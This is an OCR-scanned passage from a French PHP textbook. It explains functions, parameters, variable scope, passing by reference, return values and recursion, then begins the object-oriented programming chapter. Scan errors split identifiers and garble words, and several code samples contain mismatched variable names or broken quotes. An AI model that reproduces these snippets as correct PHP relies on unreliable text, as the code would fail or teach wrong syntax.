Ce code appelle la fonction f open ( ) . La valeur renvoyee par cette derniere sera stockee 
dans la variable $f p. On passe la variable $name comme premier parametre de f open ( ) . 
Celle-ci contient une chaine representant le nom du fichier a ouvrir. Le deuxieme para- 
metre passe est une variable appelee $mode ouverture, qui contient une chaine repre- 
sentant le mode d'ouverture du fichier. Dans cet exemple, nous n'avons pas fourni les 
troisieme et quatrieme parametres facultatifs. 

Appel d'une fonction indefinie 

L'appel d'une fonction qui n'existe pas provoque la production d'un message d'erreur 
comme celui de la Figure 5.3. 



Figure 5.3 

Ce message d'erreur 
resulte de l'appel 
d'une fonction qui 
n'existe pas. 



Mozilla Fireta S 



Fatal error: Call to undefined function fonctioti_inconnuc() in /Users 
/jaco/Sites/chapitre 5/fonction_irjconnue.pbp on line 3 



Les messages d'erreur affiches par l'interpreteur PHP sont generalement tres utiles. 
Celui de la Figure 5.3 nous indique exactement le contexte dans lequel s'est produite 
l'erreur, e'est-a-dire le nom du fichier, le numero de la ligne du script et le nom de la 
fonction qui a ete appelee et qui n'existe pas. Ces indications permettent en principe de 
corriger facilement et rapidement l'erreur survenue. 

A l'affichage d'un tel message d'erreur, vous devez vous poser deux questions : 

1 . Le nom de la fonction est-il correctement orthographie dans le script ? 

2. La fonction appelee existe-t-elle dans la version de PHP utilisee ? 

Les noms des fonctions sont parfois difficiles a memoriser. Par exemple, certaines fonc- 
tions predefmies de PHP ont des noms composes de deux mots separes par un caractere 
de soulignement (comme strip tags( )), tandis que d'autres ont des noms formes de 
deux mots accoles (comme stripslashes ( )). La presence d'une faute d'orthographe 
dans le nom d'une fonction provoque l'erreur montree a la Figure 5.3. 



158 Partiel 



Utilisation de PHP 



Certaines fonctions decrites dans cet ouvrage n'existent pas dans la version 4.0 de 
PHP car nous partons du principe que vous etes au moins equipe de la version 5.0. 
Chaque nouvelle version de PHP apporte son lot de nouveautes qui enrichissent les 
fonctionnalites et les performances du langage et justifient done une mise a jour. 
Vous pouvez consulter dans le manuel en ligne de PHP (http://no.php.net/manual/ 
fr/) la date d'ajout de chaque fonction disponible. L'appel d'une fonction non decla- 
ree dans la version de PHP utilisee provoque l'erreur dont le message est montre a la 
Figure 5.3. 

L'une des autres raisons qui peuvent conduire a ce message d'erreur peut etre que la 
fonction que vous appelez fait partie d'une extension de PHP qui n'est pas chargee. Par 
exemple, si vous essayez d'utiliser des fonctions de la bibliotheque gd (manipulation 
d'images) alors que vous ne l'avez pas installee, vous obtiendrez ce message. 

Casse et noms des fonctions 

Les appels de fonctions ne sont pas sensibles a la casse. Les appels de fonction nom ( ) , 
Fonction Nom( ) et FONCTION NOM sont done tous valides et conduisent au meme resul- 
tat. Vous etes libre de choisir la casse qui vous convient et que vous jugez plus facile a 
lire mais essayez de rester coherent. Dans cet ouvrage, comme dans la plupart des 
ouvrages de programmation, la convention adoptee consiste a ecrire tous les noms de 
fonctions en minuscules. 

Les noms de fonctions se comportent differemment des noms de variables puisque ces 
derniers sont, eux, sensibles a la casse: $Nom et $nom designent done deux variables 
differentes, alors que Nom( ) et nom( ) designent la meme fonction. 

Definir ses propres fonctions ? 

Au cours des chapitres precedents, nous avons ete amends a etudier et a utiliser 
un certain nombre de fonctions predefmies de PHP. Toutefois, la reelle puissance d'un 
langage de programmation tient dans la possibility de creer des fonctions person- 
nalisees. 

Grace aux fonctions predefmies dans PHP, vous pouvez interagir avec des fichiers, 
manipuler une base de donnees, creer des images et vous connecter a d' autres serveurs. 
Malgre toute la richesse de ces possibility's, vous devrez souvent realiser des traitements 
que les createurs du langage n'ont pas prevus. 

Vous n'etes heureusement pas limite aux fonctions predefmies de PHP : vous pouvez 
creer des fonctions personnalisees qui accompliront les traitements que vous souhaitez. 
Votre code consistera certainement en une combinaison de fonctions existantes et de 
logique personnelle ; l'ensemble etant destine a realiser des taches particulieres. 
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Lorsque vous ecrivez un bloc de code pour effectuer une tache que vous serez vraisem- 
blablement amend a reutiliser a plusieurs autres endroits dans votre script, voire dans 
d'autres scripts, vous avez tout interet a declarer ce bloc de code comme une fonction. 

Declarer une fonction permet d'utiliser du code personnalise a la maniere des fonctions 
predefinies de PHP : il suffit d'appeler la fonction utilisateur et de lui fournir les para- 
metres requis. Vous pouvez ainsi appeler et reutiliser la meme fonction plusieurs fois 
dans un meme script. 

Structure de base d'une fonction 

Une declaration de fonction cree, ou declare, une nouvelle fonction. Une declaration 
commence par le mot-cle function, suivi du nom de la fonction, de ses parametres et 
du code a executer a chaque appel de la fonction. 

La declaration d'une fonction triviale s'effectue de la maniere suivante : 

function ma_f onction ( ) { 

echo 'ma_f onction a ete appelee.'; 

} 

Cette declaration de fonction commence par function pour que le lecteur et l'interpre- 
teur PHP sachent que le code qui suit est celui d'une fonction personnalisee. Le nom de 
la fonction etant ma fonction, nous pouvons appeler notre nouvelle fonction au moyen 
de 1' instruction suivante : 

ma_f onction ( ) ; 

Vous l'avez probablement devine, 1' appel de cette fonction se traduit par l'affichage 
dans la fenetre du navigateur du texte "ma fonction a ete appelee.". 

Alors que les fonctions predefinies dans PHP sont utilisables dans tous les scripts PHP, 
les fonctions personnalisees ne le sont que par les scripts dans lesquels elles ont ete 
declarees. II est conseille de placer dans un meme fichier, ou dans un ensemble de 
fichiers, toutes les fonctions personnalisees couramment utilisees. Cette astuce permet 
en effet au programmeur d'acceder a toutes ses fonctions par une simple instruction 
require ( ) inseree dans chacun des scripts. 

Dans une declaration de fonction, le code accomplissant la tache requise doit etre place 
entre accolades. Ce code peut contenir tout ce qui est autorise dans un script PHP, y 
compris des appels d'autres fonctions, des declarations de nouvelles variables ou fonc- 
tions, des instructions require () ou include(), des declarations de classe et du code 
HTML. Lorsque, au sein d'une fonction, il est necessaire de quitter PHP et d'afficher 
du code HTML brut, il suffit de proceder comme en tout autre endroit d'un script : en 
placant une balise PHP de fermeture avant le code HTML. 
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Le code qui suit est une variante possible de l'exemple precedent et il produit le meme 
resultat : 

<?php 

function ma_f onction ( ) { 

?> 

ma_f onction a ete appelee. 
<?php 
} 

?> 

Vous remarquerez que le code PHP est encadre par des balises PHP d'ouverture/ferme- 
ture. Dans la plupart des fragments de code donnes en exemple dans cet ouvrage, ces 
balises ne sont pas montrees. Nous les avons montrees dans cet exemple car elles y sont 
indispensables. 

Attribution d'un nom a une fonction 

Votre souci principal, lors du choix d'un nom pour une fonction personnalisee, devrait 
etre d' adopter un nom court mais explicite. Par exemple, pour une fonction creant un 
en-tete de page web, les noms entete page ( ) ou entetePage ( ) seraient appropries. 

Les quelques restrictions a prendre en compte lors du choix des noms de fonctions sont 
les suivantes : 

■ Ne donnez pas a une fonction un nom deja attribue a une autre fonction. 

■ Un nom de fonction ne peut contenir que des lettres, des chiffres et des blancs soulignes. 

■ Un nom de fonction ne doit pas commencer par un chiffre. 

De nombreux langages de programmation autorisent la reutilisation des noms de fonc- 
tions. On parle alors de "surcharge de fonction" (overloading). PHP interdit la 
surcharge des fonctions, c'est-a-dire qu'il ne permet pas de donner a une fonction 
personnalisee le meme nom qu'une fonction predefinie ou qu'une autre fonction 
personnalisee. Notez egalement que, si chaque script PHP "connait" toutes les fonc- 
tions PHP predefmies, les fonctions personnalisees ne sont connues que dans les scripts 
ou elles sont declarees. Par consequent, rien ne vous empeche de reutiliser le nom d'une 
de vos fonctions personnalisees pour l'attribuer a une autre fonction contenue dans un 
autre fichier. Cette pratique est toutefois source de confusion et devrait etre evitee. 

Les differents noms qui suivent sont tous corrects : 

nom( ) 
nom2( ) 
nom_trois( ) 
_nomquatre( ) 
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tandis que ceux-ci sont incorrects : 

5nom( ) 
nom-six( ) 
fopen( ) 

(Le dernier de ces noms aurait ete autorise s'il n'etait pas deja attribue a une fonction 
predefinie.) 

Bien que $nom ne soit pas un nom correct pour une fonction, un appel de fonction comme : 
$nom( ) ; 

peut s'executer correctement, selon la valeur de $nom. En effet, PHP prend la valeur 
stockee dans $nom, recherche une fonction portant ce nom et essaie de l'appeler pour 
vous. Ces fonctions sont appelees des fonctions variables. Elles peuvent etre utiles a 
l' occasion. 



Parametres 

Pour accomplir la tache pour laquelle elles ont ete cogues, la plupart des fonctions 
requierent que un ou plusieurs parametres leur soient fournis. Un parametre permet de 
passer des donnees a une fonction. Voici l'exemple d'une fonction qui prend un tableau 
unidimensionnel comme parametre et l'affiche sous la forme d'une table : 

function creer_table($donnees) { 
echo '<table border ="1">'; 

reset($donnees) ; // Revient pointer sur le debut des donnees 
$valeur = current ($donnees) ; 
while ($value) { 

echo "<tr><td>" . $valeur . "</td></tr>\n" ; 

$valeur = next ($donnees) ; 

} 

echo "</table>"; 

} 

Si la fonction creer table ( ) est appelee de la maniere suivante : 

$mon_tableau = array('Ligne un.','Ligne deux . ' , ' Ligne trois.'); 
creer_table($mon_tableau) ; 

le resultat obtenu sera celui de la Figure 5.4. 

Figure 5.4 

L'appel de la fonction 
creer_table() produit 
I'affichage de ce 
tableau HTML. 
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En passant un parametre a creer table ( ), nous avons pu manipuler au sein de cette 
derniere des donnees creees en dehors de la fonction sous le nom $donnees. 

Tout comme les fonctions predefinies, les fonctions definies par l'utilisateur peuvent 
prendre plusieurs parametres et peuvent egalement prendre des parametres facultatifs. 
La fonction creer table() peut etre amelioree de diverses manieres, par exemple en 
permettant a celui qui l'appelle de preciser la bordure ou d'autres attributs du tableau. 
Voici une version amelioree de cette fonction, qui est tres semblable a la precedente, si 
ce n'est qu'elle permet de definir (de maniere facultative) la largeur de la bordure, 
l'espacement entre les cellules et celui entre le contenu des cellules et la bordure : 

function creer_table2( $donnees, $contour =1, $remplissage = 4, 

$espacement = 4 ) { 
echo "<table border = '$contour' cellpadding = '$remplissage ' " 

." cellspacing = '$espacement> ' " ; 
reset($donnees) ; 
$valeur = current ($donnees) ; 
while ($valeur) { 

echo "<tr><td>" . $valeur . "</td></tr>\n" ; 
$valeur = next ($donnees) ; 

} 

echo '</table>' ; 

} 

Le premier parametre de la fonction creer table2() est obligatoire, comme dans 
creer table(). Les trois parametres suivants sont facultatifs, parce que des valeurs par 
defaut sont indiquees pour ces parametres dans la declaration de la fonction. Cet appel de la 
fonction creer table2 ( ) produit done un resultat tres comparable a celui de la Figure 5.4 : 

creer_table2($mon_tableau) ; 

Pour une presentation plus aeree des donnees du tableau, nous pouvons appeler 
creer table2 ( ) de la maniere suivante : 

creer_table2($mon_tableau , 3, 8, 8); 

Lorsque des parametres sont facultatifs, il n'est pas indispensable de leur fournir des 
valeurs. L'interpreteur PHP assigne les parametres de la gauche vers la droite. 

N'oubliez pas qu'il n'est pas possible d'omettre un parametre facultatif lors de l'appel 
d'une fonction et de passer un autre parametre facultatif place a sa droite dans la defi- 
nition de la fonction. Dans 1' exemple precedent, il faut passer une valeur pour le 
parametre remplissage pour pouvoir passer une valeur pour le parametre espace 
ment. Le non-respect de cette regie est a l'origine de nombreuses erreurs de program- 
mation. Par ailleurs, cette regie est la raison pour laquelle les parametres facultatifs 
doivent toujours apparaitre en dernier dans la liste des parametres. 

L'appel de fonction suivant : 

creer_table2($mon_tableau , 3); 
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est tout a fait correct et cree une bordure large de 3 pixels ; les espacements entre les 
cellules et a l'interieur de celles-ci sont dermis par leurs valeurs par defaut. 

Vous pouvez egalement declarer des fonctions qui acceptent un nombre variable de 
parametres. Le nombre de parametres passes et leurs valeurs peuvent etre retrouves 
a l'aide de trois fonctions auxiliaires : tunc num args(), func get arg() et 
tunc get args(). 

Etudiez par exemple la fonction suivante : 

function params_variables ( ) { 
echo "Nombre de parametres : "; 
echo func_num_args( ) ; 

echo "<br />"; 
$params = f unc_get_args ( ) ; 
foreach ($params as $param) { 
echo $param . "<br />" ; 

} 

Cette fonction indique le nombre de parametres qui lui sont passes et affiche chacun 
d'eux. La fonction func num args() renvoie le nombre d'arguments passes et 
func get args ( ) renvoie un tableau des parametres. Vous pouvez egalement acceder a 
un parametre particulier en utilisant la fonction func get arg(), a laquelle il faut 
passer le numero du parametre souhaite (les parametres sont numerates en commencant 
a zero). 

Portee 

Vous avez peut-etre note que, lorsque nous avons besoin d'utiliser des variables dans un 
fichier charge via une instruction require ( ) ou include ( ) , nous les declarons simple - 
ment dans le script avant l'instruction require ( ) ou include ( ). En revanche, avec une 
fonction, les variables requises au sein de la fonction doivent etre explicitement passees 
a la fonction sous forme de parametres. Cette difference s'explique en partie par le fait 
qu'il n'existe pas de mecanisme permettant de passer explicitement des variables a des 
fichiers inclus, et en partie parce que la portee d'une variable est differente pour les 
fonctions. 

La portee d'une variable definit les parties du code ou cette variable est visible et utili- 
sable. Chaque langage de programmation a ses propres regies en la matiere et celles de 
PHP sont relativement simples : 

■ La portee d'une variable declaree au sein d'une fonction s'etend de l'instruction a 
partir de laquelle elle est declaree jusqu' a 1' accolade de fermeture de la fonction. La 
portee est alors dite "limitee a la fonction" et les variables portent le nom de variables 
locales. 
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■ La portee d'une variable declaree en dehors d'une fonction s'etend de 1' instruction 
dans laquelle elle est declaree jusqu' a la fin du fichier, exception faite des fonctions. 
La portee est alors globale et les variables elles-memes sont qualifiees de variables 
globales. 

■ Les variables superglobales sont visibles aussi bien a l'interieur qu' a l'exterieur des 
fonctions (reportez-vous au Chapitre 1 pour plus d' informations sur ces variables). 

S L'utilisation des instructions require () et include () n'affecte pas la portee des 
variables. S'il est fait appel a l'une de ces instructions a l'interieur d'une fonction, la 
portee est limitee a la fonction. Si cet appel est realise a l'exterieur d'une fonction, 
la portee est globale. 

■ Le mot-cle global peut etre employe pour indiquer explicitement qu'une variable 
defame ou utilisee au sein d'une fonction a une portee globale. 

■ Une variable peut etre supprimee explicitement via un appel unset 
($nom variable). Lorsqu'une variable a ete traitee par la fonction unset(), elle 
n'existe plus dans la portee. 

Les quelques exemples qui suivent vous aideront a mieux saisir les implications de ces 
regies. 

L execution du code ci-apres ne produit aucun resultat. Ici, on declare une variable 
appelee $var sans une fonction appelee fn(). Cette variable etant declaree dans une 
fonction, sa portee est limitee a la fonction et elle n'existe done qu'entre le point ou elle 
a ete declaree et la fin de la fonction. Lorsque $var est utilisee en dehors de la fonction 
fn(), PHP cree une nouvelle variable appelee $var. Cette nouvelle variable est de 
portee globale et reste visible jusqu'a la fin du fichier. $var etant uniquement utilisee 
dans une instruction echo, elle ne recevra jamais de valeur. 

function fn() { 
$var = " contenu " ; 

} 

fn(); 

echo $var; 

Voici la situation inverse, ou une variable est declaree en dehors de la fonction f n ( ) et 
ou nous tentons de l'utiliser a l'interieur de celle-ci. 

function fn() { 

echo 'Dans la fonction, $var = ' . $var . '<br />'; 
$var = "contenu 2" ; 

echo 'Dans la fonction, $var = ' . $var . '<br />'; 

} 

$var = "contenu 1 " ; 
fn(); 

echo 'En dehors de la fonction, $var = ' . $var . '<br />'; 
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L' execution de ce fragment de code conduit au resultat suivant : 

Dans la fonction, $var = 

Dans la fonction, $var = contenu 2 

En dehors de la fonction, $var = contenu 1 

Les fonctions n'etant executees que lorsqu'elles sont appelees, la premiere instruction 
executee dans ce code est $var = "contenu 1 ";. Une variable appelee $var est alors 
creee, dont la portee est globale et qui contient la chaine "contenu 1". PHP execute 
ensuite l'appel a la fonction f n ( ) en executant dans l'ordre les lignes qui constituent la 
declaration de la fonction. La premiere de ces lignes fait reference a une variable appe- 
lee $var. Au moment de l'execution de cette ligne, l'interpreteur PHP ne peut pas voir 
la variable $var deja creee et cree une nouvelle variable dont la portee se limite a la 
fonction fn(). C'est l'affichage du contenu de cette nouvelle variable au moyen de 
l'instruction echo qui produit la premiere ligne de la sortie. 

La ligne qui vient ensuite dans la declaration de la fonction donne a $var le contenu 
"contenu 2". Cette ligne de code appartenant a la fonction, elle modifie la valeur de la 
variable $var locale, pas celle de la variable globale. La deuxieme ligne de la sortie met 
en evidence ce fonctionnement. 

Lorsque l'execution de la fonction s'acheve, la derniere ligne de notre script est executee. 
Cette instruction echo finale montre que la valeur de la variable globale $var n'a pas ete 
affectee par l'execution de la fonction f n ( ) . 

Pour qu'une variable creee au sein d'une fonction soit de portee globale, nous devons 
utiliser le mot-cle global, comme ici : 

function fn() { 
global $var; 
$var = "contenu" ; 

echo 'Dans la fonction, $var = ' . $var . '<br />'; 

} 

fn(); 

echo 'En dehors de la fonction, $var = '. $var. '<br />'; 

Dans cet exemple, la variable $var est explicitement dermic comme globale. Apres 
l'appel de la fonction f n ( ) , la variable continue done d'exister en dehors de la fonction. 
L'execution de ce fragment de code produit l'affichage suivant : 

Dans la fonction, $var = contenu 

En dehors de la fonction, $var = contenu 

Notez que la portee de la variable commence au point ou la ligne global $var; est 
executee. Nous aurions aussi bien pu placer la declaration de la fonction apres qu'avant 
la ligne contenant l'appel de la fonction. Une declaration de fonction peut etre indiffe- 
remment placee en n'importe quel point d'un script. En revanche, la position de l'appel 
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de la fonction est importante, puisqu'elle definit l'endroit du script ou est executee la 
fonction. 

Le mot-cle global peut egalement etre utilise en debut de script, a la premiere utilisa- 
tion d'une variable, arm d'indiquer a PHP que la variable doit etre de portee globale. 
Cet usage du mot-cle global est probablement le plus courant. 

Les exemples precedents montrent bien qu'il est parfaitement possible d'utiliser le 
meme nom pour des variables declarees en dehors et a l'interieur d'une fonction, sans 
qu'il y ait d' interference. Cette pratique est toutefois deconseillee car elle est source de 
confusion. 

Passer des parametres par reference et par valeur 

Pour ecrire une fonction appelee incrementer ( ) qui nous permette d' incrementer une 
valeur, nous pourrions etre tentes d'ecrire le code suivant : 

function incrementer($valeur, $montant = 1) { 
$valeur = $valeur +$montant; 

} 

Ce code ne produit pourtant pas le resultat escompte : l'execution des lignes suivantes 
affichera "10" : 

$valeur = 10; 
incrementer ($valeur) ; 
echo $valeur; 

A cause des regies de portee, le contenu de la variable $valeur n'a pas ete modifie. En 
effet, ce code cree une variable appelee $valeur qui contient la valeur 1 0, puis appelle 
la fonction incrementer ( ). La variable $valeur utilisee dans la fonction incremen 
ter ( ) est creee au moment de l'appel de la fonction. L'interpreteur PHP ajoute 1 a cette 
variable, qui prend par consequent la valeur 11 dans la fonction et jusqu'a la fin de 
celle-ci. L'interpreteur revient ensuite au code qui a appele incrementer ( ). Dans ce 
code, $valeur est une variable differente, de portee globale, dont le contenu n'a done 
pas change. 

Nous pourrions resoudre ce probleme en declarant $valeur dans la fonction en tant que 
variable globale. Mais, pour utiliser la fonction incrementer ( ) , nous serions alors dans 
l'obligation de donner le nom $valeur a la variable a incrementer. 

Les parametres d'une fonction sont normalement passes a la fonction par valeur. 
Lorsqu'un parametre est passe a une fonction, PHP cree une nouvelle variable conte- 
nant la valeur transmise. II s'agit done d'une copie de la variable originale. Cette valeur 
copiee peut ainsi etre modinee a loisir, sans que la valeur de la variable d'origine n'en 
soit affectee (notre explication simplifie legerement le mecanisme interne veritablement 
mis en ceuvre). 
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Ici, la meilleure approche consiste a utiliser le passage de parametre par reference. 
Dans ce cas, au lieu de creer une nouvelle variable pour le parametre passe a la fonc- 
tion, l'interpreteur passe une reference sur la variable d'origine. Cette reference est 
associee a un nom de variable qui commence par un signe dollar et elle peut etre utilisee 
comme n'importe quelle variable. Cependant, au lieu de posseder sa propre valeur, une 
reference pointe sur la valeur d'origine. Toute modification apportee a la reference sera 
done repercutee sur la variable originale. 

Pour indiquer qu'un parametre est passe par reference, il suffit de le faire preceder 
d'une esperluette (&) dans la definition de la fonction. L'appel de la fonction, en revanche, 
ne necessite aucune modification. 

Dans l'exemple precedent, nous pouvons modifier la fonction incremented ) pour 
aboutir au resultat recherche, en passant a la fonction le premier parametre par refe- 
rence. 

function incrementer(&$valeur, $montant = 1) { 
$valeur = $valeur +$montant; 

} 

Ainsi formulee, notre fonction effectue le traitement attendu et nous avons toute liberte 
pour le choix du nom de la variable a incrementer. Comme nous 1' avons deja 
mentionne, l'utilisation d'un meme nom de variable a l'interieur et a l'exterieur d'une 
fonction est source de confusion, si bien que nous attribuerons un nouveau nom a la 
variable utilisee dans le script principal. Le code de test qui suit conduit a l'affichage du 
nombre 1 dans la fenetre du navigateur avant l'appel de la fonction incrementer ( ) et 
du nombre 1 1 apres l'appel de la fonction. 

$a = 10; 

echo $a . 1 <br /> ' ; 
incrementer($a) ; 
echo $a . ' <br /> ' ; 

Utilisation du mot-cle return 

Le mot-cle return interrompt l'execution d'une fonction. Lorsque l'execution d'une 
fonction prend fin, soit parce que toutes ses instructions ont ete executees, soit parce 
que le mot-cle return a ete atteint, l'execution se poursuit par l'instruction qui suit 
l'appel de la fonction. 

A l'appel de la fonction suivante, seule la premiere instruction echo est executee : 

function test_return ( ) { 

echo 'Cette instruction sera executee.'; 
return; 

echo 'Cette instruction ne sera jamais executee.'; 

} 
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Cette utilisation du mot-cle return n'est evidemment pas des plus utiles. Normale- 
ment, le mot-cle return s'emploie pour sortir d'une fonction, au milieu de celle-ci, 
lorsqu'une certaine condition a ete verifiee. 

Une condition d'erreur est une raison typique d'utiliser une instruction return pour 
interrompre l'execution d'une fonction avant sa fin. Par exemple, supposez qu'il nous 
faille ecrire une fonction determinant quel est le plus grand de deux nombres. II faudrait 
que l'execution de la fonction puisse etre interrompue si l'un des deux nombres n'a pas 
ete fourni. 

function superieur( $x, $y ) { 
if ( !isset($x) | | !isset($y) ) { 
echo "Cette fonction attend deux nombres."; 
return; 

} 

if ($x >= $y) { 

echo $x; 
} else { 

echo $y; 

} 

} 

La fonction predefinie isset ( ) permet de determiner si une variable a bien ete creee et 
si elle contient une valeur. Dans le code precedent, un message d'erreur sera produit et 
l'execution de la fonction se terminera si l'un des parametres n'a pas ete fourni avec 
une valeur. Pour cela, on utilise un test ! isset ( ), qui signifie "NON isset ()" ; l'instruc- 
tion if de ce fragment de code peut done se lire "si x n'est pas defini ou si y n'est pas 
defini''. L'execution s'interrompt si l'une de ces conditions est vraie. 

Lorsque l'interpreteur PHP atteint une instruction return dans une fonction, il 
n'execute pas les lignes qui suivent l'instruction return dans la fonction. L'execution 
du programme revient a l'endroit ou la fonction a ete appelee. Si les deux parametres 
sont bien dermis, la fonction affiche dans la fenetre du navigateur la valeur du plus 
grand des deux parametres. 

L'execution du code suivant : 

$a = 1 ; 
$b = 2.5; 
$c = 1.9; 

superieur($a, $b); 
superieur($c, $a); 
superieur($d, $a); 

produit le resultat suivant : 

2.5 
1.9 

Cette fonction attend deux nombres. 
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Retour de valeurs des fonctions 

L'utilisation du mot-cle return ne se limite pas a 1' interruption de l'execution d'une 
fonction. Dans nombre de fonctions, une instruction return sert a communiquer 
avec le code qui a appele la fonction. Ainsi, superieur ( ) pourrait se reveler plus utile 
si le resultat de la comparaison etait renvoye par la fonction au lieu d'etre affiche dans 
le navigateur. C'est alors dans le code du script principal que se deciderait l'affichage 
ou l'utilisation de ce resultat. La fonction max( ) predefinie dans PHP a exactement ce 
comportement. 

La fonction superieur ( ) pourrait ainsi etre modifiee de la maniere suivante : 

function superieur ($x, $y) { 

if ( !isset($x) | | !isset($y) ) { 

return false; 
} else if ( $x >= $y ) { 

return $x; 
} else { 

return $y; 

} 

} 

La fonction superieur ( ) renvoie a present la plus grande des deux valeurs qui lui sont 
passees en parametres. Elle renverra une valeur qui sera de toute evidence fausse en 
cas d'erreur : si l'un des nombres a comparer n'est pas fourni, la fonction retourne 
false. La seule difficulte avec cette approche est que les programmeurs appelant cette 
fonction doivent tester le type du retour avec == pour s' assurer de ne pas confondre 
false avec 0. 

A titre de comparaison, la fonction max ( ) ne renvoie rien si les deux variables n'ont pas 
ete definies. Si une seule a ete defmie, c'est elle qui est renvoyee. 

Le code qui suit : 

Sa = 1 ; $b = 2.5; $c = 1.9; 
echo superieur($a, $b) . "<br />"; 
echo superieur($c, $a) . "<br />"; 
echo superieur($d, $a) . "<br />"; 
produit le resultat suivant parce que $d n'existe pas et que false n'est pas visible : 

2.5 
1.9 

Souvent, les fonctions qui effectuent certains traitements, mais qui n'ont pas besoin de 
renvoyer de valeur, renvoient les valeurs true ou false pour signaler si elles ont reussi 
ou echoue. Les valeurs booleennes true et false peuvent etre respectivement representees 
par et 1 , bien qu'il s'agisse de types differents. 
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Recursivite 

Une fonction recursive est une fonction qui s'appelle elle-meme. Ce type de fonction se 
revele particulierement utile pour naviguer dans des structures de donnees dynamiques, 
comme les listes chainees et les arborescences. 

Toutefois, les applications web qui requierent des structures de donnees d'une telle 
complexite sont assez rares, si bien que la recursivite n'est que rarement exploitee en 
PHP. Dans nombre de cas, elle peut etre utilisee a la place d'une structure iterative, 
parce qu'elle consiste egalement a effectuer des repetitions du code. Cependant, les 
fonctions recursives etant plus lentes et consommant plus de memoire que leurs homo- 
logues iteratives, vous avez tout interet a preferer les iterations aux recursions lorsque 
c'est possible. 

Pour que cette etude soit complete, nous allons quand meme examiner l'exemple 
simple presente dans le Listing 5.5. 

Listing 5.5 : recursion.php — Une chame peut etre facilement inversee au moyen 
d'une fonction recursive. La version iterative est egalement donnee. 

function inverser_recursive ($chaine) { 
if (strlen($chaine) > 0) { 

inverser_recursive(substr($chaine, 1 ) ) ; 

} 

echo substr($chaine, 0, 1); 
return; 

} 

function inverser_iterative ($chaine) { 
for ($i=1; $i<=strlen($chaine) ; $i++) { 
echo substr($str, -$i, 1); 

} 

return; 

} 



Le Listing 5.5 contient deux fonctions qui affichent toutes deux a l'envers la chaine qui 
leur est fournie en parametre. La fonction inverser recursive ( ) est recursive, tandis 
que la fonction in verse r iterative () est iterative. 

inverser recursive () prend une chame en parametre. Lorsqu'elle est appelee, elle 
opere en s' appelant elle-meme et en se passant a chaque fois la sous-chaine comprise 
entre le deuxieme et le dernier caractere de la chaine. Cet appel, par exemple : 

inverser_recursive ( 'Bonjour' ) ; 

se traduit par la serie d'appels suivante : 

inverser_recursive ('onjour'); 
inverser_recursive ( ' n j our ' ) ; 
inverser_recursive ('jour'); 
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inverser_recursive ('our'); 

inverser_recursive ('ur'); 

inverser_recursive ('r'); 

inverser_recursive ( ' ' ) ; 

A chaque fois que la fonction s'appelle elle-meme, une nouvelle copie du code de la 
fonction est effectuee dans la memoire du serveur, mais avec un parametre different. 
Tout se passe comme si une fonction differente etait appelee chaque fois. Ce fonction- 
nement permet d'eviter la confusion entre les differentes instances de la fonction. 

A chaque appel, la longueur de la chaine est evaluee. Lorsque l'interpreteur PHP atteint 
la fin de la chame (strlen()==0), la condition n'est plus satisfaite. L' instance de la 
fonction la plus recente (inverser recursive ( ' ' )) se poursuit par l'execution de 
laprochaine ligne de code, laquelle commande d'afficher le premier caractere de la 
chaine passee en parametre. A ce stade, il n'y a pas de caractere, parce que la chaine est 
vide. 

Ensuite, cette instance de la fonction redonne le controle a l'instance qui l'a appelee, 
c'est-a-dire inverser recursive ( 'r' ). Celle-ci affiche le premier caractere de sa 
chaine, en l'occurrence 'r', et redonne le controle a l'instance qui l'a appelee. 

Le processus se poursuit ainsi, affichant un caractere puis redonnant le controle a 
l'instance precedente de la fonction selon l'ordre d'appel, jusqu'a ce que le controle soit 
redonne au programme principal. 

Les solutions recursives sont elegantes et ont un aspect mathematique indeniable mais, 
le plus souvent, la solution iterative leur est preferable. Le Listing 5.5 donne egalement 
l'equivalent iteratif de la fonction inverser recursive : vous pouvez remarquer que 
cette variante n'est pas plus longue (ce qui n'est pas toujours vrai de toutes les fonctions 
iteratives) et qu'elle produit exactement le meme resultat. 

La fonction recursive se distingue principalement de la fonction iterative par le fait 
qu'elle effectue des copies d'elle-meme dans la memoire et genera plusieurs appels de 
fonction, ce qui est couteux en termes de memoire et de temps d' execution. 

Peut-etre choisirez-vous des solutions recursives lorsqu'elles permettent d'ecrire un 
code plus court et plus elegant que la version iterative, mais cela ne se produit pas 
souvent dans le domaine des applications web. 

Bien que la recursion apparaisse plus elegante, les programmeurs oublient souvent de 
fournir une condition de terminaison dans leurs fonctions recursives. Dans ce cas, 
l'execution recursive de la fonction se poursuit jusqu'a ce que le serveur soit a court de 
memoire ou que le temps d'execution maximal ait ete depasse. 
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Pour aller plus loin 

L'usage des instructions include(), require (), function et return est egalement 
explique dans le manuel en ligne de PHP. Pour en savoir plus sur des concepts comme 
la recursivite, le passage de parametres par valeur/reference et la portee des variables 
(sujets que Ton retrouve dans plusieurs langages de progr animation), consultez un 
manuel general d'informatique comme C+ + How to Program, de Deitel et Deitel. 

Pour la suite 

Vous savez a present ameliorer la maintenabilite et la reutilisabilite de votre code par le 
recours a des fichiers de type "include" et "require" et a des fonctions. Nous allons 
done pouvoir poursuivre notre etude par 1' aspect oriente objet du langage PHP L' utili- 
sation d'objets repond aux memes objectifs que ceux des concepts decrits dans ce 
chapitre, mais avec plus d'avantages encore lorsque les projets sont complexes. 
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Ce chapitre presente les concepts de la programmation orientee objet (POO) et montre 
comment ils peuvent etre implementes en PHP. 

L' implementation de la POO en PHP possede toutes les fonctionnalites que vous seriez 
en droit d'attendre d'un langage oriente objet complet. Nous signalerons chacune de 
ces fonctionnalites a mesure que nous avancerons dans ce chapitre. 

Concepts de la programmation orientee objet 

Les langages de programmation modernes supportent generalement, voire requierent, 
une approche orientee objet du developpement logiciel. Le developpement oriente objet 
(DOO) consiste a exploiter les classifications, les relations et les proprietes des objets 
d'un systeme pour faciliter le developpement des programmes et la reutilisation du 
code. 

Classes et objets 

Dans le contexte de la POO, un objet peut etre quasiment tout element ou concept, 
c'est-a-dire un objet physique comme un bureau ou un client, ou un objet conceptuel 
qui n'existe que dans le programme lui-meme, comme un champ de saisie ou un fichier. 
Le plus souvent, le developpeur s'interesse aux objets du monde reel et aux objets 
conceptuels qui doivent etre representes dans le programme. 

Un logiciel oriente objet est concu et construit sous la forme d'un ensemble d'objets 
independants dotes a la fois d'attributs et d' operations qui interagissent pour repondre 
a nos besoins. Les attributs sont des proprietes ou des variables qui se rapportent a 
l'objet. Les operations sont des methodes, des actions ou des fonctions que l'objet peut 
accomplir, soit pour se modifier lui-meme, soit pour produire un effet externe (le terme 
attribut est utilise de maniere interchangeable avec les termes variable membre et 
